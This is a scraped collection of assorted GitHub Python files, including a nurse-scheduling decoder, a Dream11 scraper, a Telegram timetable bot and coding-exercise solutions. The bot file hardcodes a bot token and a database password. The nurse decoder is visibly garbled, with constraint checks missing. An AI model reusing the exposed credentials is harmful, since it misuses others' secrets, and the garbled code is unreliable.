+{"seq_id":"69967717522","text":"import numpy as np\nimport math, sys\n\ndef getChromosomeLength(data):\n return int(data[\"numNurses\"])*24\n\ndef decode(population, data):\n for ind in population:\n solution, fitness=decoder_assignment(data,ind['chr'])\n ind['solution']=solution\n ind['fitness']=fitness\n return(population)\n\n\n\ndef test(data,working):\n\n Demand=list(map(float,data[\"Demand\"][:]))\n numNurses=int(data[\"numNurses\"])\n minHours=int(data[\"minHours\"])\n maxHours=int(data[\"maxHours\"])\n maxConsec=int(data[\"maxConsec\"])\n maxPresence=int(data[\"maxPresence\"])\n\n #--------------------------------- Number of nurses working\n used=[0]*numNurses\n\n #--------------------------------- Demand\n flagDemand=True\n\n for i in range(24):\n somme=0\n for j in range(numNurses):\n somme+=working[j][i]\n\n if (somme==Demand[i]):\n flagDemand=True\n else:\n flagDemand=False\n\n #--------------------------------- minHours & maxHours\n flagminHours=True\n flagmaxHours=True\n\n for i in range(numNurses):\n somme=0\n for j in range(24):\n somme+=working[i][j]\n\n if (somme>0):\n used[i]=1\n\n if ((used[i]==1) & (somme>minHours)):\n flagminHours=True\n else:\n flagminHours=False\n\n if (somme=1):\n flagmaxResting=True\n else:\n flagmaxResting=False\n\n\n\n Flag=((flagDemand) & (flagminHours) & (flagmaxHours) & (flagmaxConsec) & (flagmaxPresence) & (flagmaxResting))\n\n\n return used, Flag\n\n\n\ndef First(n,working):\n first=0\n while (working[n][first]==0):\n first+=1\n return first\n\n\ndef Last(n,working):\n last=23\n while (working[n][last]==0):\n last-=1\n return last\n\n\n\n\n\n\n\ndef decoder_assignment(data,chromosome):\n\n \n numNurses=int(data[\"numNurses\"])\n\n\n working=np.zeros((numNurses,24))\n solution=[None]*(getChromosomeLength(data))\n\n\n for i in range(getChromosomeLength(data)):\n\n n=i//24\n h=i%24\n\n if chromosome[i]>=0.5:\n working[n][h]=1\n else:\n working[n][h]=0\n \n solution[i]=working[n][h]\n\n \n #CONSTRAINTS\n used,Flag=test(data,working)\n \n \n if (Flag):\n fitness=sum(used)\n else:\n fitness=99999999\n\n\n\n\n return solution, fitness\n\n","repo_name":"EmelineGOT/FIB","sub_path":"AMMM/BRKGA/DECODER_assignment.py","file_name":"DECODER_assignment.py","file_ext":"py","file_size_in_byte":3479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"22526394129","text":"import argparse\nimport operator\nfrom collections import OrderedDict\nimport time\nimport traceback\nfrom base64 import b64decode\nfrom copy import deepcopy\nfrom selenium.common.exceptions import WebDriverException\nfrom utils.config import Config\nfrom utils.get_logger import Logger\nfrom utils.utils import save_to_csv\nfrom utils.config import ConfigParser\n\nconfig = ConfigParser()\nconfig.optionxform = str\n\n\nclass Dream11(object):\n def __init__(self):\n self.driver = None\n self.obj = Config()\n self.logger = Logger.get_console_logger()\n self.file_logger = Logger.get_file_logger()\n\n def get_data(self, driver_name='phantom', filename='players.txt', sortby=1):\n try:\n with open(filename, 'w') as f:\n f.truncate()\n players_bat = dict()\n players_wk = dict()\n players_bowl = dict()\n players_ar = dict()\n self.file_logger.info(\n \"********************************************************************************\")\n self.driver = self.obj.get_driver_instance(driver_name)\n if driver_name == 'chrome':\n try:\n time.sleep(5)\n self.driver.switch_to_window(self.driver.window_handles[1])\n if self.driver.current_url == \\\n 'chrome-extension://cfhdojbkjhnklbpkdaibdccddilifddb/firstRun.html':\n # Closing Adblock tab\n self.driver.execute_script('window.close();')\n self.driver.switch_to_window(self.driver.window_handles[0])\n except IndexError:\n pass\n self.logger.info(\"Initialized driver...\")\n self.logger.info(\"Navigating to dream11 homepage...\")\n self.driver.get(self.obj.get_xpath(\"Target_URL\"))\n self.logger.info(\"Entering username\")\n self.obj.send_keys(self.driver, self.obj.get_xpath(\"Username_input\"),\n self.obj.get_xpath(\n \"Username\"))\n self.logger.info(\"Entering password\")\n self.obj.send_keys(self.driver, self.obj.get_xpath(\"Password_input\"), b64decode(\n self.obj.get_xpath(\"Password\")))\n self.logger.info(\"Clicking on login\")\n self.obj.click_element(self.driver, self.obj.get_xpath(\"Login_btn\"))\n time.sleep(10)\n try:\n self.logger.info(\"Selecting match\")\n self.obj.click_element(self.driver, self.obj.get_xpath(\"Match_selector\"))\n time.sleep(3)\n self.logger.info(\"Clicking on Create Team\")\n self.obj.click_element(self.driver, self.obj.get_xpath(\"Create_team_btn\"))\n time.sleep(5)\n # Getting Bats info\n self.logger.info(\"Clicking on BAT tab\")\n self.obj.click_element(self.driver, self.obj.get_xpath(\"Bat_tab_link\"))\n self.logger.info(\"Getting Batsmen info...\")\n total_bats = self.obj.wait_for_elements(self.driver, self.obj.get_xpath(\n \"Players_batsmens\"))\n for each_ele in total_bats:\n player_name = self.obj.get_text_from_element(\n self.obj.wait_for_element_inside_webelement(each_ele, self.obj.get_xpath(\n \"Player_name_text\")))\n self.logger.info(\"Clicking on info\")\n time.sleep(3)\n self.obj.wait_for_element_inside_webelement(each_ele, self.obj.get_xpath(\n \"Info_link\")).click()\n self.logger.info(\"Getting Info\")\n time.sleep(3)\n player_percentage = self.obj.get_text_from_element(\n self.obj.wait_for_element(self.driver, self.obj.get_xpath(\n \"Player_percentage_text\")))\n players_bat[player_name] = float(player_percentage)\n self.obj.click_element(self.driver, self.obj.get_xpath(\"Popup_close\"))\n # Getting Bowls info\n self.logger.info(\"Clicking on BOWL tab\")\n self.obj.click_element(self.driver, self.obj.get_xpath(\"Bowl_tab_link\"))\n self.logger.info(\"Getting Bowlers info...\")\n total_bowls = self.obj.wait_for_elements(self.driver, self.obj.get_xpath(\n \"Players_bowlers\"))\n for each_ele in total_bowls:\n player_name = self.obj.get_text_from_element(\n self.obj.wait_for_element_inside_webelement(each_ele, self.obj.get_xpath(\n \"Player_name_text\")))\n self.logger.info(\"Clicking on info\")\n time.sleep(3)\n self.obj.wait_for_element_inside_webelement(each_ele, self.obj.get_xpath(\n \"Info_link\")).click()\n self.logger.info(\"Getting Info\")\n time.sleep(3)\n player_percentage = self.obj.get_text_from_element(\n self.obj.wait_for_element(self.driver, self.obj.get_xpath(\n \"Player_percentage_text\")))\n players_bowl[player_name] = float(player_percentage)\n self.obj.click_element(self.driver, self.obj.get_xpath(\"Popup_close\"))\n # Getting Allrounders info\n self.logger.info(\"Clicking on AR tab\")\n self.obj.click_element(self.driver, self.obj.get_xpath(\"Ar_tab_link\"))\n self.logger.info(\"Getting AllRounders info...\") \n total_ars = self.obj.wait_for_elements(self.driver, self.obj.get_xpath(\n \"Players_allrounders\"))\n for each_ele in total_ars:\n player_name = self.obj.get_text_from_element(\n self.obj.wait_for_element_inside_webelement(each_ele, self.obj.get_xpath(\n \"Player_name_text\")))\n self.logger.info(\"Clicking on info\")\n time.sleep(3)\n self.obj.wait_for_element_inside_webelement(each_ele, self.obj.get_xpath(\n \"Info_link\")).click()\n self.logger.info(\"Getting Info\")\n time.sleep(3)\n player_percentage = self.obj.get_text_from_element(\n self.obj.wait_for_element(self.driver, self.obj.get_xpath(\n \"Player_percentage_text\")))\n players_ar[player_name] = float(player_percentage)\n self.obj.click_element(self.driver, self.obj.get_xpath(\"Popup_close\"))\n # Getting Wicket-Keepers info\n self.logger.info(\"Clicking on WK tab\")\n self.obj.click_element(self.driver, self.obj.get_xpath(\"Wk_tab_link\"))\n self.logger.info(\"Getting Wicket-Keepers info...\") \n total_wks = self.obj.wait_for_elements(self.driver, self.obj.get_xpath(\n \"Players_wicketkeepers\"))\n for each_ele in total_wks:\n player_name = self.obj.get_text_from_element(\n self.obj.wait_for_element_inside_webelement(each_ele, self.obj.get_xpath(\n \"Player_name_text\")))\n self.logger.info(\"Clicking on info\")\n time.sleep(3)\n self.obj.wait_for_element_inside_webelement(each_ele, self.obj.get_xpath(\n \"Info_link\")).click()\n self.logger.info(\"Getting Info\")\n time.sleep(3)\n player_percentage = self.obj.get_text_from_element(\n self.obj.wait_for_element(self.driver, self.obj.get_xpath(\n \"Player_percentage_text\")))\n players_wk[player_name] = float(player_percentage)\n self.obj.click_element(self.driver, self.obj.get_xpath(\"Popup_close\"))\n sorted_bat = sorted(players_bat.items(), key=operator.itemgetter(1), reverse=True)\n self.write_to_players('BAT', OrderedDict(sorted_bat))\n sorted_wk = sorted(players_wk.items(), key=operator.itemgetter(1), reverse=True)\n self.write_to_players('WK', OrderedDict(sorted_wk))\n sorted_bowl = sorted(players_bowl.items(), key=operator.itemgetter(1), reverse=True)\n self.write_to_players('BOWL', OrderedDict(sorted_bowl))\n sorted_ar = sorted(players_ar.items(), key=operator.itemgetter(1), reverse=True)\n self.write_to_players('AR', OrderedDict(sorted_ar))\n\n except Exception:\n self.logger.info(\"Exception Occurred... writing to the log file\")\n self.file_logger.debug(traceback.format_exc())\n finally:\n # Logout\n self.driver.get(self.obj.get_xpath(\"Target_URL\"))\n time.sleep(5)\n self.logger.info(\"Logging out...\")\n self.obj.click_element(self.driver, self.obj.get_xpath(\"Team_dropdown\"))\n self.obj.click_element(self.driver, self.obj.get_xpath(\"Logout_btn\"))\n\n except WebDriverException:\n self.logger.info(\"Exception Occurred... writing to the log file\")\n self.file_logger.debug(traceback.format_exc())\n finally:\n if self.driver:\n self.driver.quit()\n else:\n print(\"Driver not initialized\")\n\n @staticmethod\n def write_to_players(section_name, data):\n \"\"\"\n This function takes section_name and data and\n write to the players.txt file.\n @param: section_name: str: section name to be written\n @param: data: OrderedDict: players data to be written\n \"\"\"\n fp = open('players.txt', 'a')\n config.add_section(section_name)\n for key,value in data.iteritems():\n config.set(section_name, key, str(value))\n config.write(fp)\n fp.close()\n\n\nclass Dream11Exception(Exception):\n \"\"\"\n Custom Exception Class \n \"\"\"\n\n def __init__(self, message):\n super(Exception, self).__init__(message)\n self.message = message\n\n def __str__(self):\n return self.message\n\n\ndef construct_orderd_dict_from_players(section_name):\n res = list()\n config.read('players.txt')\n options = config.options(section_name)\n for option in options:\n res.append((option, config.get(section_name, option)))\n return OrderedDict(res)\n\n\ndef read_from_players():\n player_dict = dict()\n player_dict['BAT'] = construct_orderd_dict_from_players('BAT')\n player_dict['WK'] = construct_orderd_dict_from_players('WK')\n player_dict['BOWL'] = construct_orderd_dict_from_players('BOWL')\n player_dict['AR'] = construct_orderd_dict_from_players('AR')\n return player_dict\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"An utility that reads\\\n the given file having two team players\\\n separated by commas and generate required\\\n number of pairs of cap and vice-cap\")\n arg_group = parser.add_argument_group(\"Required Arguments\")\n arg_group.add_argument(\"-s\", \"--sortby\", required=False, help=\"An argument\\\n which tells to sort by player name or odds?\")\n arg_group.add_argument(\"-d\", \"--usedf\", required=False, help=\"This tells \\\n whether to use DataFrames or not\")\n args = parser.parse_args()\n sortby = args.sortby if args.sortby else 1\n use_df = args.usedf if args.usedf else 0\n if args.usedf:\n try:\n use_df = int(use_df)\n except ValueError:\n raise ValueError(\"-d argument should be an integer\")\n try:\n sortby = int(sortby)\n except ValueError:\n raise ValueError(\"-s argument should be an integer\")\n obj = Dream11()\n obj.get_data()","repo_name":"Abhioo8/dream11-team-select","sub_path":"get_player_odds.py","file_name":"get_player_odds.py","file_ext":"py","file_size_in_byte":12196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"7874704042","text":"\"\"\"\nName: byroncbr_11.py\nAuthor: bangrenc\nTime: 5/7/2020 3:39 PM\n\"\"\"\n\ndef maxArea(height):\n length = len(height)\n f = 0\n l = length\n m_area = 0\n\n for i in range(length):\n if height[f] > height[l-1]:\n area = (length-i-1) * height[l-1]\n l = l - 1\n\n else:\n area = (length-i-1) * height[f]\n f = f + 1\n\n if area > m_area:\n m_area = area\n\n return m_area\n\nif __name__ == '__main__':\n test = [1,8,6,2,5,4,8,3,7]\n result = maxArea(test)\n print(result)\n\n\n","repo_name":"bangrenc/learnGit","sub_path":"byroncbr_11.py","file_name":"byroncbr_11.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"14373281364","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom yangguang.items import YangguangItem\n\n\nclass YgSpider(scrapy.Spider):\n\tname = 'yg'\n\tallowed_domains = ['wz.sun0769.com']\n\tstart_urls = ['http://wz.sun0769.com/index.php/question/questionType?type=4&page=0']\n\n\tdef parse(self, response): # 提取列表页的数据\n\t\t# 1.提取当前页的数据\n\t\t# 先分组,再提取\n\t\ttr_list = response.xpath(\"//div[@class='greyframe']/table[2]/tr/td/table/tr\")\n\t\tprint(tr_list)\n\t\tfor tr in tr_list:\n\t\t\titem = YangguangItem()\n\t\t\titem[\"num\"] = tr.xpath(\"./td[1]/text()\").extract_first()\n\t\t\titem[\"title\"] = tr.xpath(\"./td[2]/a[2]/text()\").extract_first()\n\t\t\titem[\"href\"] = tr.xpath(\"./td[2]/a[2]/@href\").extract_first()\n\t\t\titem[\"status\"] = tr.xpath(\"./td[3]/span/text()\").extract_first()\n\t\t\titem[\"name\"] = tr.xpath(\"./td[4]/text()\").extract_first()\n\t\t\titem[\"publish_date\"] = tr.xpath(\"./td[5]/text()\").extract_first()\n\t\t\t# yield scrapy.Request(\n\t\t\t# \titem[\"href\"],\n\t\t\t# \tcallback=self.parse_detail,\n\t\t\t# \tmeta={\"a\": item}\n\t\t\t# )\n\t\t\tprint(item)\n\n\t\t# 2. 构造下一页的请求,翻页\n\t\tnext_url = response.xpath(\"//a[text()='>']/@href\").extract_first()\n\t\tif next_url is not None:\n\t\t\t# 构造请求\n\t\t\tyield scrapy.Request(next_url, callback=self.parse)\n\n\tdef parse_detail(self, resposne): # 提取详情页的数据\n\t\titem = resposne.meta[\"a\"]\n\t\titem[\"img\"] = resposne.xpath(\"//div[@class='textpic']/img/@src\").extract_first()\n\t\titem[\"content\"] = resposne.xpath(\"//div[@class='c1 text14_2']//text()\").extract()\n\t\tprint(item)\n\t\t# yield item\n","repo_name":"mufengpy/spider-yangguang","sub_path":"yangguang/spiders/yg.py","file_name":"yg.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"73809188882","text":"class Solution:\n class Tape:\n # tape = repeated pattern + word\n def __init__(self, last_word: str, pattern_len: int, total_len: int) -> None:\n self.last_word = last_word\n self.pattern_len = pattern_len\n self.total_len = total_len\n\n def solve(self, tapes: list[Tape], idx: int):\n for i in range(len(tapes) - 1, 0, -1):\n cur_tape, prev_tape = tapes[i], tapes[i - 1]\n idx %= cur_tape.pattern_len\n if idx >= prev_tape.total_len:\n if prev_tape.total_len:\n idx = idx % prev_tape.total_len\n return cur_tape.last_word[idx]\n\n def add_tape(self, tapes: list[Tape], word: str, c: str | int):\n pattern_len = tapes[-1].total_len + len(word)\n total_len = pattern_len * int(c)\n tape = self.Tape(word, pattern_len, total_len)\n tapes.append(tape)\n\n def decodeAtIndex(self, s: str, k: int) -> str:\n tapes = [self.Tape(\"\", 0, 0)]\n word = \"\"\n for c in s:\n if c.isalpha():\n word += c\n else:\n self.add_tape(tapes, word, c)\n word = \"\"\n if word:\n self.add_tape(tapes, word, 1)\n\n return self.solve(tapes, k - 1)\n","repo_name":"Ismail-Mahmoud/Competitive-Programming","sub_path":"Problems/LeetCode/880.Decoded-String-at-Index.py","file_name":"880.Decoded-String-at-Index.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"71448191123","text":"# coding: utf-8\nimport sys\nimport os\nsys.path.append('..')\ntry:\n import urllib.request\nexcept ImportError:\n raise ImportError('Use Python3!')\nimport pickle\nimport numpy as np\n\nvocab_file = 'ptb.vocab.pkl'\n\ndataset_dir = os.path.dirname(os.path.abspath(__file__))\n\ndef load_vocab():\n # 語彙ファイルの保存先パス生成\n vocab_path = dataset_dir + '/' + vocab_file \n\n # 語彙ファイルの存在チェック\n if os.path.exists(vocab_path):\n with open(vocab_path, 'rb') as f:\n word_to_id, id_to_word = pickle.load(f)\n return word_to_id, id_to_word\n\n # 語彙マッピングの初期化\n word_to_id = {}\n id_to_word = {}\n\n # トレーニングデータの読み込み(ダウンロード)(変える必要あり)\n data_type = 'train'\n file_name = key_file[data_type]\n file_path = dataset_dir + '/' + file_name\n\n _download(file_name)\n\n # 単語リストの生成(変える必要あり)\n words = open(file_path).read().replace('\\n', '').strip().split()\n\n for i, word in enumerate(words):\n if word not in word_to_id:\n tmp_id = len(word_to_id)\n word_to_id[word] = tmp_id\n id_to_word[tmp_id] = word\n\n with open(vocab_path, 'wb') as f:\n pickle.dump((word_to_id, id_to_word), f)\n\n return word_to_id, id_to_word\n\n","repo_name":"yy006/replication","sub_path":"IP2Vec/dataset/bcd.py","file_name":"bcd.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"23387172689","text":"# 本测试用于比较+ 与join函数在拼接字符串使得效率\n\nimport time\n\n# 使用+拼接字符串\ntime01 = time.time() # 起始时间\n\ns = \"\"\n\nfor i in range(100000):\n s += \"str\"\n\ntime02 = time.time()\nprint(\"delta={0}\".format(time02 - time01))\n\n\n# 使用join拼接字符串\nl = []\nfor i in range(100000):\n l.append(\"str\")\n\ntime01 = time.time() # 起始时间\n\ns = \"\"\ns = \"\".join(l)\n\ntime02 = time.time()\nprint(\"delta={0}\".format(time02 - time01))\n","repo_name":"YingnanHan/Python-400-Series","sub_path":"Python 400 集/Chapter02 内置数据类型/37.综合测试.py","file_name":"37.综合测试.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"3"}
+{"seq_id":"2840487403","text":"\"\"\"\nEnglish grammar and typing system\n\"\"\"\nfrom collections import OrderedDict\n\nfrom multivac.src.gan.gen_pyt.asdl.asdl import (ASDLCompositeType,\n ASDLConstructor, ASDLGrammar,\n ASDLPrimitiveType,\n ASDLProduction, Field)\nfrom multivac.src.gan.gen_pyt.asdl.lang.eng.eng_asdl_helper import \\\n english_ast_to_asdl_ast\nfrom multivac.src.gan.gen_pyt.asdl.lang.grammar import Grammar\n\nBRACKET_TYPES = {\n ASDLPrimitiveType('-LRB-'): '(',\n ASDLPrimitiveType('-RRB-'): ')',\n ASDLPrimitiveType('-LCB-'): '{',\n ASDLPrimitiveType('-RCB-'): '}',\n ASDLPrimitiveType('-LSB-'): '[',\n ASDLPrimitiveType('-RSB-'): ']',\n}\n\nTERMINAL_TYPES = {\n ASDLPrimitiveType('CC'), # Coordinating conjunction\n ASDLPrimitiveType('CD'), # Cardinal number\n ASDLPrimitiveType('DT'), # Determiner\n ASDLPrimitiveType('EX'), # Existential there\n ASDLPrimitiveType('FW'), # Foreign word\n ASDLPrimitiveType('IN'), # Preposition or subordinating conjunction\n ASDLPrimitiveType('JJ'), # Adjective\n ASDLPrimitiveType('JJR'), # Adjective, comparative\n ASDLPrimitiveType('JJS'), # Adjective, superlative\n ASDLPrimitiveType('LS'), # List item marker\n ASDLPrimitiveType('MD'), # Modals\n ASDLPrimitiveType('NN'), # Noun, singular or mass\n ASDLPrimitiveType('NNS'), # Noun, plural\n ASDLPrimitiveType('NNP'), # Proper noun, singular\n ASDLPrimitiveType('NNPS'), # Proper noun, plural\n ASDLPrimitiveType('PDT'), # Predeterminer\n ASDLPrimitiveType('POS'), # Possessive ending\n ASDLPrimitiveType('PRP'), # Personal pronoun\n ASDLPrimitiveType('PRP$'), # Possessive pronoun (prolog version PRP-S)\n ASDLPrimitiveType('RB'), # Adverb\n ASDLPrimitiveType('RBR'), # Adverb, comparative\n ASDLPrimitiveType('RBS'), # Adverb, superlative\n ASDLPrimitiveType('RP'), # Particle\n ASDLPrimitiveType('SYM'), # Symbol\n ASDLPrimitiveType('TO'), # to\n ASDLPrimitiveType('UH'), # Interjection\n ASDLPrimitiveType('VB'), # Verb, base form\n ASDLPrimitiveType('VBD'), # Verb, past tense\n ASDLPrimitiveType('VBG'), # Verb, gerund or present participle\n ASDLPrimitiveType('VBN'), # Verb, past participle\n ASDLPrimitiveType('VBP'), # Verb, non-3rd person singular present\n ASDLPrimitiveType('VBZ'), # Verb, 3rd person singular present\n ASDLPrimitiveType('WDT'), # Wh-determiner\n ASDLPrimitiveType('WP'), # Wh-pronoun\n ASDLPrimitiveType('WP$'), # Possessive wh-pronoun (prolog version WP-S)\n ASDLPrimitiveType('WRB') # Wh-adverb\n}\n\n\nclass EnglishGrammar(Grammar):\n\n def __init__(self, rules):\n super().__init__(rules)\n\n self.terminal_types.update(TERMINAL_TYPES)\n self.terminal_types.update(BRACKET_TYPES)\n\n\nclass EnglishASDLGrammar(ASDLGrammar):\n \"\"\"\n Collection of types, constructors and productions\n \"\"\"\n\n def __init__(self, grammar=None, productions=None):\n # productions are indexed by their head types\n self._productions = OrderedDict()\n self._constructor_production_map = dict()\n\n if productions is not None:\n english_prods = set(productions)\n\n for prod in english_prods:\n if prod.type not in self._productions:\n self._productions[prod.type] = list()\n self._productions[prod.type].append(prod)\n self._constructor_production_map[prod.constructor.name] = prod\n\n self.root_type = ASDLCompositeType(\"ROOT\")\n elif grammar is not None:\n if isinstance(grammar, ASDLGrammar):\n self = grammar\n return\n\n for rule in grammar.rules:\n fields = []\n\n for child in rule.children:\n if grammar.is_terminal(child):\n child_type = ASDLPrimitiveType(child.type)\n else:\n child_type = ASDLCompositeType(child.type)\n\n fields.append(Field(child.type, child_type, 'single'))\n\n constructor = ASDLConstructor(rule.type, fields)\n production = ASDLProduction(ASDLCompositeType(rule.type),\n constructor)\n\n if production.type not in self._productions:\n self._productions[production.type] = list()\n\n self._productions[production.type].append(production)\n self._constructor_production_map[constructor.name] = production\n\n self.root_type = ASDLCompositeType(grammar.root_node.type)\n\n self.size = sum(len(head) for head in self._productions.values())\n self.terminal_types = set(self.primitive_types)\n self.terminal_types.update(TERMINAL_TYPES)\n self.terminal_types.update(BRACKET_TYPES.keys())\n\n self._types = sorted(self.terminal_types.union(set(self.types)),\n key=lambda x: x.name)\n\n # get entities to their ids map\n self.prod2id = {prod: i for i, prod in enumerate(self.productions)}\n self.type2id = {type: i for i, type in enumerate(self.types)}\n self.field2id = {field: i for i, field in enumerate(self.fields)}\n\n self.id2prod = {i: prod for i, prod in enumerate(self.productions)}\n self.id2type = {i: type for i, type in enumerate(self.types)}\n self.id2field = {i: field for i, field in enumerate(self.fields)}\n\n @staticmethod\n def from_text(text, parser):\n productions = set()\n\n if isinstance(text, list):\n text = '\\n'.join(text)\n\n for s in text:\n try:\n p = parser.get_parse(s)['sentences'][0]['parse']\n except Exception:\n continue\n try:\n parse_tree = english_ast_to_asdl_ast(p.parse_string)\n except Exception:\n continue\n\n productions.update(parse_tree.get_productions())\n\n productions = sorted(productions, key=lambda x: x.__repr__)\n\n grammar = EnglishASDLGrammar(productions=productions)\n return grammar\n","repo_name":"GallupGovt/multivac","sub_path":"src/gan/gen_pyt/asdl/lang/eng/grammar.py","file_name":"grammar.py","file_ext":"py","file_size_in_byte":6244,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"3"}
+{"seq_id":"37468913727","text":"import datetime\r\nimport psycopg2\r\nimport telebot\r\nfrom telebot import types\r\n\r\ntoken = \"2113287709:AAEQLuoZQRTeaK3Bqk46A-mNl9xGw_qDo1w\"\r\nbot = telebot.TeleBot(token)\r\ndate = datetime.date.today().isocalendar()[1]\r\n\r\nconn = psycopg2.connect(database=\"postgres\",\r\n user=\"postgres\",\r\n password=\"3308_Blbgh\",\r\n host=\"localhost\",\r\n port=\"5432\")\r\n\r\ncursor = conn.cursor()\r\n\r\n\r\n@bot.message_handler(commands=['start'])\r\ndef start(message):\r\n keyboard = types.ReplyKeyboardMarkup()\r\n keyboard.row(\"Понедельник\", \"Вторник\", \"Среда\", \"Четверг\", \"Пятница\", \"Расписание на текущую неделю\",\r\n \"Расписание на следующую неделю\")\r\n bot.send_message(message.chat.id, 'Здесь можно посмотреть расписание БФИ2102', reply_markup=keyboard)\r\n\r\n\r\n@bot.message_handler(commands=['week'])\r\ndef week(message):\r\n if date % 2 == 0:\r\n bot.send_message(message.chat.id, 'Сейчас нижняя неделя')\r\n if date % 2 == 1:\r\n bot.send_message(message.chat.id, 'Сейчас верхняя неделя')\r\n\r\n\r\n@bot.message_handler(commands=['help'])\r\ndef help_message(message):\r\n bot.send_message(message.chat.id, '''Данный бот присылает расписание.\r\n\r\n /week - Текущая неделя\r\n /help - Помощь\r\n /mtuci - Ссылка на официальный сайт МТУСИ''')\r\n\r\n@bot.message_handler(commands=['mtuci'])\r\ndef mtuci(message):\r\n bot.send_message(message.chat.id, 'https://mtuci.ru/')\r\n\r\n@bot.message_handler(content_types=['text'])\r\ndef dododo(message):\r\n days = ['Понедельник', 'Вторник', 'Среда', 'Четверг', 'Пятница']\r\n week = datetime.date.today().isocalendar()[1] % 2\r\n table = 'service.timetable_odd' if week else 'service.timetable_even'\r\n\r\n if message.text == \"Понедельник\" or message.text == \"Вторник\" or message.text == \"Среда\" or message.text == \"Четверг\" or message.text == \"Пятница\":\r\n try:\r\n\r\n cursor.execute(\r\n \"SELECT subject, room_numb, start_time FROM {} WHERE day='{}'\".format(table, message.text))\r\n result = cursor.fetchall()\r\n to_print = []\r\n for i in result:\r\n to_print.append(', '.join(i) + '\\n')\r\n\r\n bot.send_message(message.chat.id, ''.join(to_print))\r\n except:\r\n bot.send_message(message.chat.id, 'Пар нет')\r\n\r\n\r\n\r\n elif message.text == 'Расписание на текущую неделю':\r\n to_print = []\r\n for day in days:\r\n cursor.execute(\r\n \"SELECT subject, room_numb, start_time FROM {} WHERE day='{}'\".format(table, day))\r\n result = cursor.fetchall()\r\n tmp = []\r\n tmp.append(day + '\\n' + '_________\\n')\r\n for i in result:\r\n tmp.append(', '.join(i) + '\\n')\r\n to_print.append(''.join(tmp) + '\\n')\r\n bot.send_message(message.chat.id, ''.join(to_print))\r\n\r\n elif message.text == 'Расписание на следующую неделю':\r\n to_print = []\r\n table = 'service.timetable_odd' if table == 'service.timetable_even' else 'service.timetable_even'\r\n for day in days:\r\n cursor.execute(\r\n \"SELECT subject, room_numb, start_time FROM {} WHERE day='{}'\".format(table, day))\r\n result = cursor.fetchall()\r\n tmp = []\r\n tmp.append(day + '\\n' + '_________\\n')\r\n for i in result:\r\n tmp.append(', '.join(i) + '\\n')\r\n to_print.append(''.join(tmp) + '\\n')\r\n table = 'service.timetable_odd' if table == 'service.timetable_even' else 'service.timetable_even'\r\n bot.send_message(message.chat.id, ''.join(to_print))\r\n\r\n\r\nbot.polling()","repo_name":"maxim1903/mtuci","sub_path":"timetable_bot-main/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4128,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"40681911603","text":"\"\"\"Conftest for xknxproject.\"\"\"\nimport json\nfrom test import STUBS_PATH\n\nfrom xknxproject.models import KNXProject\n\n\ndef assert_stub(to_be_verified: KNXProject, stub_name: str) -> None:\n \"\"\"Assert input matched loaded stub file.\"\"\"\n stub_path = STUBS_PATH / stub_name\n\n def remove_xknxproject_version(obj: KNXProject) -> KNXProject:\n \"\"\"Remove xknxproject_version from object.\"\"\"\n version_string = obj[\"info\"].pop(\"xknxproject_version\")\n assert len(version_string.split(\".\")) == 3\n return obj\n\n with open(stub_path, encoding=\"utf-8\") as stub_file:\n stub = remove_xknxproject_version(json.load(stub_file))\n to_be_verified = remove_xknxproject_version(to_be_verified)\n for key, value in stub.items():\n assert key in to_be_verified, f\"`{key}` key missing in generated object\"\n assert value == to_be_verified[key], f\"`{key}` item does not match\"\n\n for key in to_be_verified.keys():\n assert key in stub, f\"`{key}` key of generated object missing in stub\"\n","repo_name":"XKNX/xknxproject","sub_path":"test/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"3"}
+{"seq_id":"6269669727","text":"\n#_ 조건 문자열\ndef solution(ineq, eq, n, m):\n if eq == '!':\n answer = eval(str(n) + ineq + str(m))\n else:\n answer = eval(str(n) + ineq + eq + str(m))\n return answer * 1\n\n# # 다른 풀이\ndef solution(ineq, eq, n, m):\n return int(eval(str(n) + ineq + eq.replace('!', '') + str(m)))\n\n# # 다른 풀이\ndef solution(ineq, eq, n, m):\n answer = 0\n if n > m and ineq ==\">\":\n answer = 1\n elif n < m and ineq == \"<\":\n answer = 1\n elif n == m and eq == \"=\":\n answer = 1\n return answer\n\n#_ 문자열 바꿔서 찾기\ndef solution(myString, pat):\n table = myString.maketrans({'A':'B', 'B':'A'})\n value = myString.translate(table)\n return 1 if pat in value else 0\n\n# # 다른 풀이\ndef solution(myString, pat):\n tmp = ''\n for word in myString:\n if word == \"A\":\n word = \"B\"\n else:\n word = \"A\"\n \n tmp += word\n # tmp.find(pat) >= 0 : tmp 안에 pat이 존재한다.\n # tmp.find(pat) != -1 : tmp 안에 pat이 없지 않다면\n return int(tmp.find(pat) >= 0)\n\n# # 다른 풀이\ndef solution(myString, pat): \n tmp = ''.join([\"B\" if i == \"A\" else \"A\" for i in myString]) \n return int(pat in tmp)\n\n#_ 배열의 원소 만큼 추가하기\ndef solution(arr):\n answer = []\n for num in arr:\n for _ in range(num):\n answer.append(num)\n return answer\n\n# # 다른 풀이\ndef solution(arr):\n answer = []\n for num in arr:\n answer += [num] * num\n return 